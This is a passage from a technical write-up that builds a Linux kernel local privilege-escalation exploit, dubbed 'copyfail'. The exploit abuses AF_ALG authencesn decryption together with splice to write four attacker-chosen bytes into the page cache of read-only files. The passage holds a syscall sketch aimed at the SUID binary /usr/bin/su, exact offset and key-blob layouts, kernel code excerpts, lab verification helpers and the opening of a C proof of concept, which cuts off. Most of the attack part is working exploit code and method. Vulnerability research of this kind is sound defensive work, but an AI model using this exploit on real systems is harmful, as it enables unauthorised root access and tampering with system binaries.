* This is a syscall-level sketch, not a complete standalone exploit.
* Key setup, authsize setup, IV/control messages, exact offsets, and
* error handling are intentionally collapsed so primitive shape stays visible.
*/
/* 1. Open the AF_ALG AEAD transform. */
int tfm_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))",
};
bind(tfm_fd, (struct sockaddr *)&sa, sizeof(sa));
/*
* 2. Configure key/authsize, then accept the operation socket.
*
* setsockopt(tfm_fd, SOL_ALG, ALG_SET_KEY, ...);
* setsockopt(tfm_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, ...);
*/
int op_fd = accept(tfm_fd, NULL, NULL);
/*
* Victim target:
*
* The first splice selects the target file-backed page that we want
* to carry into the pipe, and later into the AF_ALG TX scatterlist.
*/
char *victim = "/usr/bin/su";
int target_file_fd = open(victim, O_RDONLY);
off_t target_file_offset = 0x1234; /* victim file/page selection offset */
size_t splice_len = 0x1000; /* enough bytes for the planned TX layout */
int pipe_fds[2];
pipe(pipe_fds);
/*
* 3. Queue attacker-controlled AAD.
*
* AAD[4:8] becomes seqno_lo.
* authencesn later writes these 4 bytes through:
*
* scatterwalk_map_and_copy(tmp + 1,
* dst,
* assoclen + cryptlen,
* 4,
* 1);
*/
uint8_t write_value[4] = { 'P', 'W', 'N', '!' };
uint8_t aad[8];
memset(aad, 'A', 4); /* AAD[0:4] */
memcpy(aad + 4, write_value, 4); /* AAD[4:8] = seqno_lo */
struct iovec aad_iov = {
.iov_base = aad,
.iov_len = sizeof(aad),
};
struct msghdr aad_msg = {
.msg_iov = &aad_iov,
.msg_iovlen = 1,
.msg_control = cmsg_buf, /* ALG_SET_OP / ALG_SET_AEAD_ASSOCLEN / IV */
.msg_controllen = cmsg_len,
};
/*
* MSG_MORE keeps the AF_ALG request open so more input can be appended.
*/
sendmsg(op_fd, &aad_msg, MSG_MORE);
/*
* 4. Splice the target file page into a pipe.
*
* Kernel-side effect:
*
* target file page cache
* -> pipe_buffer
*/
splice(
target_file_fd,
&target_file_offset,
pipe_fds[1],
NULL,
splice_len,
0
);
/*
* 5. Splice the pipe into the AF_ALG operation socket.
*
* Kernel-side effect:
*
* pipe_buffer
* -> bio_vec
* -> msg_iter marked MSG_SPLICE_PAGES
* -> AF_ALG TX scatterlist
*/
splice(
pipe_fds[0],
NULL,
op_fd,
NULL,
splice_len,
0
);
/*
* 6. Trigger decrypt.
*
* rx_buf is the normal caller-provided receive buffer.
*
* _aead_recvmsg() builds:
*
* RX output head -> preserved TX tag tail
*
* Then authencesn performs the destination-side scratch write.
*/
recv(op_fd, rx_buf, rx_len, 0);
The exact offset choreography is handled later (see 5.2). For now, the important mapping is:
- target_file_offset → selects file-backed page entering pipe
- AF_ALG decrypt layout → positions that page inside the preserved TX tag tail
- assoclen + cryptlen → makes the authencesn scratch write land at the RX/TX chain boundary
Read as one execution stream:
controlled AAD[4:8]
│
│ sendmsg()
▼
AF_ALG request input
│
│ splice(file -> pipe)
▼
pipe references target page-cache page
│
│ splice(pipe -> AF_ALG socket)
▼
AF_ALG TX scatterlist contains page-backed entry
│
│ recv()
▼
_aead_recvmsg() chains TX tag tail after RX output
│
│ authencesn decrypt
▼
AAD[4:8] written at dst @ assoclen + cryptlen
The decrypt may fail authentication, but that failure is not a rollback point. The scratch write has already happened.
4.3.7 Execution from Corrupted Cache
After the overwrite, the target file's page-cache page contains modified bytes. For an executable file, later execve() may consume those cached bytes as instruction data.
For a root-owned SUID target, that means:
4-byte page-cache overwrite
│
▼
corrupted executable page
│
▼
later execve()
│
▼
modified code runs in SUID program context
At this point, the remaining exploit work is to place attacker-controlled patch bytes into the victim file's page-cache page.
In Chapter 7, we will finally turn this primitive into working exploit implementations across different languages — right after a quick PoC to understand how to construct an exploit (Chapter 5) with some runtime debugging evidence demonstration (Chapter 6).
5 PoC Walkthrough
Before moving to the final exploit, we should first prove the primitive against a harmless lab file. The goal here is not privilege escalation yet. It is simpler:
can a failed authencesn() decrypt request change 4 bytes in the page cache of a file that userspace opened read-only?
5.1 Lab Target
Create a small read-only file with an obvious marker at the offset we want to corrupt:
python3 - <<'PY'
from pathlib import Path
p = Path("./target.bin").resolve()
data = bytearray(b"A" * 0x3000)
data[0x1234:0x1238] = b"ORIG"
p.write_bytes(data)
p.chmod(0o444)
marker = p.read_bytes()[0x1234:0x1238]
print(f"[+] wrote {p}")
print("[+] marker @ 0x1234:", marker)
PY
ls -li ./target.bin
xxd -g1 -s 0x1220 -l 0x40 ./target.bin
The target is a normal regular file with size 0x3000 and read-only permissions. The terminal capture below still shows an older run that used ~/lab/copyfail/target.bin; the PoCs and verification commands in this chapter now use ./target.bin so they can be run from any working directory:
axura@pwnlab:~$ ls -li ~/lab/copyfail/target.bin
1622290 -r--r--r-- 1 axura axura 12288 May 15 23:53 /home/axura/lab/copyfail/target.bin
axura@pwnlab:~$ stat ~/lab/copyfail/target.bin
  File: /home/axura/lab/copyfail/target.bin
  Size: 12288  Blocks: 24  IO Block: 4096  regular file
Device: 8,2  Inode: 1622290  Links: 1
Access: (0444/-r--r--r--)  Uid: ( 1000/ axura)  Gid: ( 1000/ axura)
Access: 2026-05-15 23:53:22.301189474 +0800
Modify: 2026-05-15 23:53:22.301129036 +0800
Change: 2026-05-15 23:53:22.301129036 +0800
 Birth: 2026-05-15 23:53:22.300816681 +0800
The marker string we care about, "ORIG" (hex: 4f 52 49 47), sits at file offset 0x1234:
axura@pwnlab:~$ xxd -g1 -s 0x1220 -l 0x40 ~/lab/copyfail/target.bin
00001220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00001230: 41 41 41 41 4f 52 49 47 41 41 41 41 41 41 41 41  AAAAORIGAAAAAAAA
00001240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00001250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
The file is read-only from userspace, but that does not mean its bytes cannot be cached. Once the file is read or spliced, the kernel may keep its contents in the page cache. The rest of the lab uses this marker to check whether the cached file page changes.
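For repeated checks it is handy to have the marker read as a small helper instead of eyeballing xxd output. The sketch below is only a convenience wrapper: `read_marker` is a hypothetical name, and the defaults assume the lab layout above (marker at 0x1234, 4 bytes long). An ordinary read like this is served from the page cache when the page is cached, so it reports what the kernel currently holds for that offset.

```python
import os


def read_marker(path: str, offset: int = 0x1234, length: int = 4) -> bytes:
    """Return `length` bytes at `offset`, read through the normal file path."""
    fd = os.open(path, os.O_RDONLY)
    try:
        # pread() reads at an absolute offset without moving the file position.
        return os.pread(fd, length, offset)
    finally:
        os.close(fd)


if __name__ == "__main__" and os.path.exists("./target.bin"):
    print("marker @ 0x1234:", read_marker("./target.bin"))
```

Running it before and after an experiment gives a direct before/after comparison of the same 4 bytes.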
5.2 Offset And Layout Choreography
The PoC succeeds only if the file bytes we want to change are positioned exactly where authencesn() performs its 4-byte scratch write. This section reduces the offset problem to one layout rule:
Target marker must sit at the beginning of the AEAD tag region
5.2.1 Scratch Write Boundary
The vulnerable write uses the destination scatterlist (the dst argument of scatterwalk_map_and_copy() triggered during the esn decrypt path, introduced in 3.4.4) at logical offset:
assoclen + cryptlen
In the authencesn() decrypt path, cryptlen is first reduced by the authentication tag size, so at the moment of the scratch write it means ciphertext length only. Therefore assoclen + cryptlen points to the boundary after AAD || ciphertext, which is also the beginning of the preserved tag tail:
TX input: AAD || ciphertext || tag
RX output: AAD || plaintext
^
|
scratch write starts here
So the target file bytes must occupy the start of the tag region inside the spliced file segment.
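The boundary arithmetic is small enough to write down directly. This is a sketch with a hypothetical helper name, `scratch_write_offset`; it assumes `cryptlen` is passed in as the request value on entry (ciphertext plus tag), mirroring the `cryptlen -= authsize` step, and the example lengths are illustrative.

```python
def scratch_write_offset(assoclen: int, cryptlen: int, authsize: int) -> int:
    """Logical dst offset where the 4-byte scratch write starts.

    `cryptlen` is the value on entry to decrypt: ciphertext length plus tag.
    """
    if cryptlen < authsize:
        raise ValueError("cryptlen must cover at least the tag")
    cryptlen -= authsize            # now ciphertext length only
    return assoclen + cryptlen      # end of AAD || ciphertext, start of the tag


# Illustrative request: 8-byte AAD, 0x10-byte ciphertext, 0x10-byte tag.
offset = scratch_write_offset(assoclen=8, cryptlen=0x20, authsize=0x10)
print(hex(offset))
```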
5.2.2 Ciphertext And Tag Window
The selected AEAD transform is:
authencesn(hmac(sha256),cbc(aes))
For AEAD decryption, the logical input is:
AAD || ciphertext || tag
The ciphertext part is handled by cbc(aes). AES-CBC works on 16-byte blocks, so the smallest convenient ciphertext/filler region for this lab is one block:
ciphertext/filler = 0x10 bytes
The tag size is separate from CBC. In this PoC we configure a 16-byte AEAD tag:
authsize = 0x10
That gives a simple 0x20-byte spliced window:
spliced file segment
════════════════════════════════════════════════════
┌────────────────────────┬────────────────────────┐
│ ciphertext/filler │ tag region │
│ 0x10 bytes │ 0x10 bytes │
└────────────────────────┴────────────────────────┘
0 0x10 0x20
▲
│
overwrite starts here
This layout is not trying to produce a valid CBC ciphertext. Authentication may still fail. The only requirement for the primitive is that the file-backed bytes occupy the tag-start boundary where authencesn() later writes AAD[4:8].
Visually:
required placement
════════════════════════════════════════════════════
spliced file segment
┌────────────────────────┬──────┬─────────────────┐
│ ciphertext/filler │ ORIG │ remaining tag │
│ validity not required │ 4 B │ bytes │
└────────────────────────┴──────┴─────────────────┘
▲
│
tag start / overwrite start
authencesn writes AAD[4:8] here
5.2.3 Final Lab Offsets
Before plugging in the numbers, keep the variables straight:
| Variable | Meaning | Lab value |
|---|---|---|
| overwrite_file_offset | File offset where the 4-byte overwrite should land | 0x1234 |
| authsize | AEAD authentication tag length | 0x10 |
| splice_len | Number of bytes spliced from the target file | 0x20 |
| splice_file_offset | File offset where the spliced range starts | calculated |
The "ORIG" marker string is at:
overwrite_file_offset = 0x1234
Because the overwrite starts at the beginning of the tag region, the tag must begin at 0x1234. With a 0x10-byte ciphertext/filler block before the tag, the spliced range starts one block earlier:
splice_file_offset = overwrite_file_offset - 0x10
Using the general formula:
overwrite_file_offset = splice_file_offset + (splice_len - authsize)
splice_file_offset = overwrite_file_offset - (splice_len - authsize)
we get:
overwrite_file_offset = 0x1234
authsize = 0x10
splice_len = 0x20
splice_file_offset = 0x1234 - (0x20 - 0x10)
= 0x1224
Visually:
spliced file range
══════════════════════════════════════════════════════════════
splice_file_offset overwrite_file_offset
0x1224 0x1234
│ │
▼ ▼
┌────────────────────────┬──────┬─────────────────────┐
│ ciphertext/filler │ ORIG │ remaining tag bytes │
│ 16 bytes │ 4 B │ 12 bytes │
└────────────────────────┴──────┴─────────────────────┘
▲
│
tag start / overwrite start
After the scratch write, the first 4 bytes of the tag region should become the controlled value staged in AAD[4:8]:
before: ORIG
after : PWN!
5.3 Primitive Shape
At this point, the lab offsets are fixed:
write value target : target.bin[0x1234:0x1238]
splice start : target.bin + 0x1224
splice length : 0x20
auth tag size : 0x10
So the remaining job is to express that layout through the syscall interface:
- AF_ALG setup → select authencesn(hmac(sha256),cbc(aes))
- sendmsg() → stage AAD[4:8] as the 4-byte value to write
- splice() → stage the target file page into the AF_ALG TX path
- recv() → trigger decrypt and the authencesn scratch write
The following subsections build that PoC from the bottom up: first the UAPI constants, then the transform configuration, then the per-request metadata, and finally the syscall sequence.
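Before building anything on top of the fixed offsets, it is worth re-deriving them mechanically. The helper below is a minimal sketch of the general formula from 5.2.3; the function name `splice_file_offset` simply mirrors the variable in that table and is not part of any API.

```python
def splice_file_offset(overwrite_file_offset: int, splice_len: int, authsize: int) -> int:
    """Where the spliced file range must start so the tag begins at the target."""
    filler_len = splice_len - authsize      # ciphertext/filler bytes before the tag
    if filler_len < 0:
        raise ValueError("splice_len must be at least authsize")
    if overwrite_file_offset < filler_len:
        raise ValueError("target is too close to the start of the file")
    return overwrite_file_offset - filler_len


start = splice_file_offset(0x1234, splice_len=0x20, authsize=0x10)
print(hex(start))                      # start of the spliced range
print(hex(start + (0x20 - 0x10)))      # tag start, which should equal the target
```

With the lab values this reproduces the 0x1224 start and puts the tag start back at 0x1234.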
5.3.1 UAPI Constants
Before the PoC starts calling socket(), bind(), setsockopt(), and sendmsg(), we need a few constants shared between userspace and the kernel.
UAPI means userspace API. In Linux, UAPI headers define the numbers and structures that userspace programs pass into syscalls. The kernel and userspace must agree on these values. For example, when userspace calls:
socket(AF_ALG, SOCK_SEQPACKET, 0);
the value of AF_ALG must match the kernel's socket family number for the crypto socket interface.
Some libc/kernel header combinations may not expose every AF_ALG macro consistently, so in this PoC we define the needed values directly. These are not magic numbers; they come from Linux UAPI headers.
The socket family and socket-option namespace come from AF_ALG and SOL_ALG:
/* include/linux/socket.h */
#define PF_ALG 38
#define AF_ALG PF_ALG
/* include/linux/socket.h */
#define SOL_ALG 279
The AEAD request controls come from include/uapi/linux/if_alg.h:
/* Socket options */
#define ALG_SET_KEY 1
#define ALG_SET_IV 2
#define ALG_SET_OP 3
#define ALG_SET_AEAD_ASSOCLEN 4
#define ALG_SET_AEAD_AUTHSIZE 5
/* Operations */
#define ALG_OP_DECRYPT 0
#define ALG_OP_ENCRYPT 1
So the PoC values are:
| Macro | Value | Meaning in this PoC |
|---|---|---|
| AF_ALG | 38 | create a kernel crypto socket |
| SOL_ALG | 279 | tell setsockopt() / control messages this is an AF_ALG option |
| ALG_SET_KEY | 1 | configure the authenc key blob |
| ALG_SET_IV | 2 | attach the IV to the request |
| ALG_SET_OP | 3 | select encrypt/decrypt for this request |
| ALG_SET_AEAD_ASSOCLEN | 4 | tell the kernel how many queued bytes are AAD |
| ALG_SET_AEAD_AUTHSIZE | 5 | configure the authentication tag length |
| ALG_OP_DECRYPT | 0 | force the decrypt path |
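One cheap way to double-check the table on a given machine is to compare it with the constants that Python's `socket` module exports on Linux builds. This is a sketch under that assumption: `POC_CONSTANTS` and `mismatched_constants` are hypothetical names, and on platforms where the module does not define a name the check silently skips it.

```python
import socket

# Values copied from the table above.
POC_CONSTANTS = {
    "AF_ALG": 38,
    "SOL_ALG": 279,
    "ALG_SET_KEY": 1,
    "ALG_SET_IV": 2,
    "ALG_SET_OP": 3,
    "ALG_SET_AEAD_ASSOCLEN": 4,
    "ALG_SET_AEAD_AUTHSIZE": 5,
    "ALG_OP_DECRYPT": 0,
    "ALG_OP_ENCRYPT": 1,
}


def mismatched_constants() -> dict:
    """Return {name: (table_value, platform_value)} for values that disagree."""
    bad = {}
    for name, expected in POC_CONSTANTS.items():
        actual = getattr(socket, name, None)   # None when this build lacks the name
        if actual is not None and int(actual) != expected:
            bad[name] = (expected, int(actual))
    return bad


print(mismatched_constants())
```

An empty dictionary means every constant the platform exposes agrees with the table.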
5.3.2 Transform Configuration
Before staging request bytes, the AF_ALG transform socket must be configured with the AEAD properties consumed later by _aead_recvmsg() and crypto_authenc_esn_decrypt().
For this PoC, the transform setup has two important pieces:
- an authenc-compatible key blob for ALG_SET_KEY
- a 16-byte AEAD authentication tag length for ALG_SET_AEAD_AUTHSIZE
5.3.2.1 Key Blob Layout
authencesn(hmac(sha256),cbc(aes)) is a combined AEAD construction. It uses one key for HMAC authentication and another key for AES-CBC encryption. So ALG_SET_KEY cannot pass only a raw AES key; it must pass a packed blob that tells the kernel where the AES key is inside the combined key material.
Before the kernel can run:
authencesn(hmac(sha256),cbc(aes))
it needs key material for both inner algorithms:
- auth key → HMAC-SHA256
- enc key → AES-CBC
The kernel expects the ALG_SET_KEY payload to carry not just a raw AES key but both keys:
authentication key || encryption key
The authenc parser is crypto_authenc_extractkeys():
int crypto_authenc_extractkeys(struct crypto_authenc_keys *keys,
const u8 *key, unsigned int keylen)
{
struct rtattr *rta = (void *)key;
struct crypto_authenc_key_param *param;
/* The key blob must start with a valid rtattr header. */
if (!RTA_OK(rta, keylen))
return -EINVAL;
/* The rtattr must describe authenc key parameters. */
if (rta->rta_type != CRYPTO_AUTHENC_KEYA_PARAM)
return -EINVAL;
/* Read the metadata payload: enckeylen. */
param = RTA_DATA(rta);
keys->enckeylen = be32_to_cpu(param->enckeylen);
/*
* Skip the rtattr + parameter header.
* The remaining bytes are:
*
* auth key || enc key
*/
key += RTA_ALIGN(rta->rta_len);
keylen -= RTA_ALIGN(rta->rta_len);
/* There must be at least enough bytes for the encryption key. */
if (keylen < keys->enckeylen)
return -EINVAL;
/*
* Split the remaining key bytes.
*
* authkey = all bytes before the encryption key
* enckey = last enckeylen bytes
*/
keys->authkeylen = keylen - keys->enckeylen;
keys->authkey = key;
keys->enckey = key + keys->authkeylen;
return 0;
}
This means it expects a small metadata header first, followed by the authentication key and encryption key:
key blob passed to ALG_SET_KEY
════════════════════════════════════════════════════
┌──────────┬───────────────────────────┬──────────────┬───────────┐
│ rtattr │ crypto_authenc_key_param │ auth key │ enc key │
│ header │ enckeylen = 16 │ 32 bytes │ 16 bytes │
└──────────┴───────────────────────────┴──────────────┴───────────┘
│ │ │ │
│ │ │ └─ AES-CBC key
│ │ │
│ │ └─ HMAC-SHA256 key
│ │
│ └─ tells parser: last 16 bytes are enc key
│
└─ rta_type = CRYPTO_AUTHENC_KEYA_PARAM
For this PoC, we chose two simple key sizes:
HMAC-SHA256 auth key = 32 bytes
AES-CBC enc key = 16 bytes
So the raw key material is:
32-byte auth key || 16-byte AES key
That enckeylen = 16 is an integer wrapped by struct crypto_authenc_key_param:
struct crypto_authenc_key_param {
__be32 enckeylen;
};
It tells authenc where the AES key starts:
- The last 16 bytes of the key blob are the AES encryption key
- Everything before that, after the metadata header, is treated as the authentication key
So when the kernel sees 48 bytes of raw key material, it automatically computes authkeylen = 48 - 16 = 32.
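The split rule is easy to mirror in userspace. The sketch below packs a blob in the layout described above and then parses it back with the same logic as crypto_authenc_extractkeys(). It rests on a few assumptions: `pack_authenc_key` and `extract_keys` are hypothetical helper names, the key bytes are placeholders, the rtattr header is packed in native byte order, and CRYPTO_AUTHENC_KEYA_PARAM is taken to be 1 as in include/crypto/authenc.h.

```python
import struct

CRYPTO_AUTHENC_KEYA_PARAM = 1      # assumed value from include/crypto/authenc.h
RTA_ALIGNTO = 4


def rta_align(n: int) -> int:
    return (n + RTA_ALIGNTO - 1) & ~(RTA_ALIGNTO - 1)


def pack_authenc_key(authkey: bytes, enckey: bytes) -> bytes:
    rta_len = 4 + 4                # rtattr header + crypto_authenc_key_param
    header = struct.pack("=HH", rta_len, CRYPTO_AUTHENC_KEYA_PARAM)  # rta_len, rta_type
    param = struct.pack(">I", len(enckey))                            # __be32 enckeylen
    return header + param + authkey + enckey


def extract_keys(blob: bytes):
    """Split a blob into (authkey, enckey) the way the kernel parser does."""
    rta_len, rta_type = struct.unpack_from("=HH", blob, 0)
    # This sketch only accepts the 8-byte header used in this layout.
    if rta_len != 8 or rta_len > len(blob) or rta_type != CRYPTO_AUTHENC_KEYA_PARAM:
        raise ValueError("bad rtattr header")
    (enckeylen,) = struct.unpack_from(">I", blob, 4)
    rest = blob[rta_align(rta_len):]           # auth key || enc key
    if len(rest) < enckeylen:
        raise ValueError("blob too short for the encryption key")
    authkeylen = len(rest) - enckeylen
    return rest[:authkeylen], rest[authkeylen:]


# Placeholder keys, chosen only so the two halves are easy to tell apart.
blob = pack_authenc_key(authkey=b"\x11" * 32, enckey=b"\x22" * 16)
authkey, enckey = extract_keys(blob)
print(len(blob), len(authkey), len(enckey))
```

The round trip confirms that only enckeylen is stored explicitly; the authentication key length falls out of the total.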
That produces the payload used by this PoC:
metadata header length
════════════════════════════════════════
sizeof(struct rtattr) = 4
sizeof(struct crypto_authenc_key_param) = 4
rtattr.rta_len = RTA_LENGTH(sizeof(struct crypto_authenc_key_param))
= 4 + 4
= 8
full ALG_SET_KEY blob length
════════════════════════════════════════
┌─────────┬──────────────────────────┬──────────┬──────────┐
│ rtattr │ crypto_authenc_key_param │ auth key │ enc key │
│ 4 bytes │ 4 bytes │ 32 bytes │ 16 bytes │
└─────────┴──────────────────────────┴──────────┴──────────┘
metadata length = 4 + 4 = 8
raw key length = 32 + 16 = 48
total blob len = 8 + 48 = 56
5.3.2.2 Authentication Tag Size
The AEAD tag size is configured separately through ALG_SET_AEAD_AUTHSIZE.
The kernel-side detail is slightly non-obvious. In alg_setsockopt(), ALG_SET_AEAD_AUTHSIZE passes the option length into the family callback:
static int alg_setsockopt(struct socket *sock, int level, int optname,
sockptr_t optval, unsigned int optlen)
{
/*
* Generic socket object -> protocol socket state.
*/
struct sock *sk = sock->sk;
/*
* AF_ALG-specific socket state.
*
* This stores the selected algorithm instance and private
* transform data created earlier by bind().
*/
struct alg_sock *ask = alg_sk(sk);
/*
* AF_ALG family dispatch table.
*
* For salg_type = "aead", this points to the AEAD family callbacks,
* including setkey(), setauthsize(), accept(), etc.
*/
const struct af_alg_type *type;
...
case ALG_SET_AEAD_AUTHSIZE:
...
/*
* Non-obvious convention:
*
* optlen itself is treated as the requested auth tag size.
* The kernel does not read an integer from optval here.
*
* So userspace requests authsize = 0x10 with:
*
* setsockopt(fd, SOL_ALG,
* ALG_SET_AEAD_AUTHSIZE,
* NULL, 0x10);
*/
err = type->setauthsize(
ask->private, // AEAD transform/private state
optlen // requested auth tag size
);
break;
...
}
For salg_type = "aead", type->setauthsize resolves to aead_setauthsize():
static int aead_setauthsize(void *private, unsigned int authsize)
{
struct aead_tfm *tfm = private; // the AEAD transform state from ask->private
/*
* Apply the requested tag size to the real crypto_aead object.
*
* In this PoC:
*
* authsize = 0x10
*/
return crypto_aead_setauthsize(
tfm->aead, // selected AEAD transform
authsize // authentication tag size
);
}
So to request a 16-byte tag, the PoC passes 0x10 as the fifth argument (optlen) to setsockopt() and leaves optval NULL:
unsigned int authsize = 0x10;
setsockopt(tfm_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, authsize);
Note that for ALG_SET_AEAD_AUTHSIZE, alg_setsockopt() takes the tag size from the fifth setsockopt() argument, optlen. The fourth argument, optval, is not read.
That same authsize is later used to split the decrypt input:
TX input = AAD || ciphertext || tag
└── authsize bytes
and it is the value subtracted in crypto_authenc_esn_decrypt():
cryptlen -= authsize;
That configured 0x10 tag size is what produces the desired PoC layout:
[ 0x10-byte ciphertext/filler ][ 0x10-byte tag ]
5.3.3 Request Metadata
After accept() returns the operation socket, the request is not just raw bytes. The first sendmsg() also carries AEAD metadata through control messages:
- ALG_SET_OP → select encrypt or decrypt
- ALG_SET_IV → provide IV / nonce
- ALG_SET_AEAD_ASSOCLEN → tell the kernel how many queued bytes are AAD
These control messages are parsed by af_alg_cmsg_send():
case ALG_SET_IV:
/*
* IV / nonce buffer for this request.
*/
con->iv = (void *)CMSG_DATA(cmsg);
break;
case ALG_SET_OP:
/*
* Per-request operation:
*
* ALG_OP_DECRYPT = 0
* ALG_OP_ENCRYPT = 1
*/
con->op = *(u32 *)CMSG_DATA(cmsg);
break;
case ALG_SET_AEAD_ASSOCLEN:
/*
* Length of the AAD prefix inside the queued input.
*
* The first con->aead_assoclen bytes are authenticated
* but not encrypted/decrypted.
*/
con->aead_assoclen = *(u32 *)CMSG_DATA(cmsg);
break;
For the PoC, the metadata used is:
operation = ALG_OP_DECRYPT (0)
assoclen = 8
IV = request IV buffer
So _aead_recvmsg() (see 3.3.2) interprets the queued input as the desired AEAD request buffer layout:
queued TX input
════════════════════════════════════════════════════════════
┌──────────┬──────────────────────┬──────────────────────┐
│ AAD │ ciphertext/filler │ tag │
│ 8 bytes │ 16 bytes │ 16 bytes │
└──────────┴──────────────────────┴──────────────────────┘
0 8 24 40
assoclen ctx->used
5.3.4 Write Source Vs Write Target
At this point, the transform and request metadata are ready. The next thing is to keep two byte streams separate:
- write source
  - attacker-controlled AAD bytes
  - AAD[4:8] = "PWN!"
- write target
  - spliced file-backed tag region
  - target.bin[0x1234:0x1238] = "ORIG"
They are prepared through different paths and only meet later inside the kernel.
The normal sendmsg() path supplies the AAD:
AAD
┌────────────┬────────────┐
│ AAD[0:4]   │ AAD[4:8]   │
│ "AAAA"     │ "PWN!"     │
└────────────┴────────────┘
                   ▲
                   │
     attacker-controlled source value
     for scratch write
The spliced file path supplies the victim bytes:
spliced file-backed tag region
┌────────────┬─────────────────────┐
│ "ORIG"     │ remaining tag bytes │
│ 4 bytes    │ 12 bytes            │
└────────────┴─────────────────────┘
      ▲
      │
overwrite target
After _aead_recvmsg() builds the in-place decrypt request, the destination scatterlist (dst) has this logical shape:
dst logical stream
══════════════════════════════════════════════════════════════
RX output head                      chained TX tag entry
┌──────────┬───────────────────┐    ┌────────┬──────────────┐
│ AAD      │ ciphertext/filler │---▶│ "ORIG" │ tag tail ... │
│ AAAAPWN! │ 16 bytes          │    │ victim │              │
└──────────┴───────────────────┘    └────────┴──────────────┘
  ▲                                   ▲
  │                                   │
read source for tmp[]               write target after sg_next()
Then authencesn() performs the ESN shuffle (see 3.4.3):
scatterwalk_map_and_copy(tmp, dst, 0, 8, 0);
This reads the first 8 bytes of dst, which are the AAD bytes copied into the RX head:
tmp[0] = "AAAA"
tmp[1] = "PWN!"
The later scratch write uses tmp + 1:
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);
So the final value movement is:
AAD[4:8] = "PWN!"
│
▼
tmp[1]
│
▼
dst at logical offset assoclen + cryptlen
│
▼
chained TX tag entry
│
▼
target.bin page cache: "ORIG" -> "PWN!"
So the input we prepare is:
- normal sendmsg input: AAD = "AAAA" || "PWN!"
- spliced file input: a file range whose tag region begins at target offset 0x1234, where target.bin[0x1234:0x1238] initially contains "ORIG"
As noted earlier, the decrypt output itself is not the important product here. Authentication may fail. What the exploit cares about is that the internal authencesn() scratch write happens before the error is returned.
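The value movement above can be modelled in userspace. The following is a toy sketch, not kernel code: map_and_copy() is a hypothetical stand-in for scatterwalk_map_and_copy(), plain bytearrays stand in for scatterlist entries, and only the two copies quoted in this section are modelled.

```python
def map_and_copy(buf, sgl, start, nbytes, out):
    """Toy stand-in for scatterwalk_map_and_copy().

    `sgl` is a list of bytearrays treated as one logical byte stream.
    out=0 copies sgl -> buf, out=1 copies buf -> sgl.
    """
    pos = 0   # logical offset at which the current segment starts
    done = 0  # bytes copied so far
    for seg in sgl:
        seg_end = pos + len(seg)
        while done < nbytes and pos <= start + done < seg_end:
            i = start + done - pos
            if out:
                seg[i] = buf[done]
            else:
                buf[done] = seg[i]
            done += 1
        pos = seg_end
    if done != nbytes:
        raise ValueError("range runs past the end of the scatterlist")


assoclen, authsize = 8, 0x10
req_cryptlen = 0x20  # ciphertext/filler || tag, as queued by the PoC

# RX output head: AAD followed by the 16-byte ciphertext/filler.
rx_head = bytearray(b"AAAAPWN!" + b"\x00" * 16)
# Chained TX tag entry: stands in for the file-backed page bytes.
tx_tag = bytearray(b"ORIG" + b"A" * 12)
dst = [rx_head, tx_tag]

tmp = bytearray(8)                     # models u32 tmp[2]
map_and_copy(tmp, dst, 0, 8, 0)        # read the AAD into tmp
cryptlen = req_cryptlen - authsize     # cryptlen -= authsize
# tmp + 1 -> dst at logical offset assoclen + cryptlen
map_and_copy(tmp[4:8], dst, assoclen + cryptlen, 4, 1)

print(bytes(tx_tag[:4]))
```

In this model the logical offset 0x18 is exactly the length of the RX head, so the 4-byte write lands at the start of the second segment, which is the part that represents the page-cache bytes.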
5.3.5 Syscall Ordering
At syscall level, the PoC only needs to stage two inputs before calling recv():
1. normal AF_ALG input
   sendmsg()
     └─ controlled AAD
          └─ AAD[4:8] = 4-byte value to write
2. spliced page-backed input
   splice(file -> pipe)
     └─ selected file range enters pipe buffer
   splice(pipe -> AF_ALG socket)
     └─ selected file range enters AF_ALG TX scatterlist
        through MSG_SPLICE_PAGES
Then recv() turns those staged inputs into the vulnerable decrypt layout:
recv()
  └─ _aead_recvmsg()
       └─ builds chained decrypt request
            └─ RX output head -> preserved TX tag tail
authencesn decrypt
  └─ writes AAD[4:8] at assoclen + cryptlen
       └─ scatterwalk crosses into the chained TX tag entry
For the lab marker, the parameters are:
write_value = b"PWN!"
target file = "./target.bin"
target_off  = 0x1234
splice_off  = 0x1224
splice_len  = 0x20
authsize    = 0x10
Now we are ready for the proof of concept.
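As a quick sanity check on these parameters, the splice window can be derived from the target offset. This is a minimal sketch; plan_splice() is a hypothetical helper name, and the arithmetic simply mirrors the relation splice_off = target_off - (splice_len - authsize) used by the PoC.

```python
def plan_splice(target_off, splice_len=0x20, authsize=0x10):
    """Return (splice_off, tag_start, tag_end) for a 4-byte write at target_off."""
    if splice_len < authsize:
        raise ValueError("splice window must at least cover the tag")
    filler_len = splice_len - authsize    # bytes treated as ciphertext/filler
    splice_off = target_off - filler_len  # file offset where the window starts
    if splice_off < 0:
        raise ValueError("target offset is too close to the start of the file")
    tag_start = splice_off + filler_len   # first byte of the tag region
    return splice_off, tag_start, splice_off + splice_len


splice_off, tag_start, tag_end = plan_splice(0x1234)
print(hex(splice_off), hex(tag_start), hex(tag_end))  # 0x1224 0x1234 0x1244
```

The tag region starts exactly at the target offset, which is why the first four tag bytes are the ones the scratch write replaces.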
5.4 PoC In C
5.4.1 C PoC
The first PoC is in C, since our analysis followed the kernel through C structures and syscalls. It can also be downloaded from my repo as proof-of-concept/copyfail_poc.c:
// copyfail_poc.c
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/if_alg.h>
#include <linux/rtnetlink.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/uio.h>
#include <unistd.h>
#ifndef AF_ALG
#define AF_ALG 38
#endif
#ifndef SOL_ALG
#define SOL_ALG 279
#endif
#ifndef ALG_SET_KEY
#define ALG_SET_KEY 1
#endif
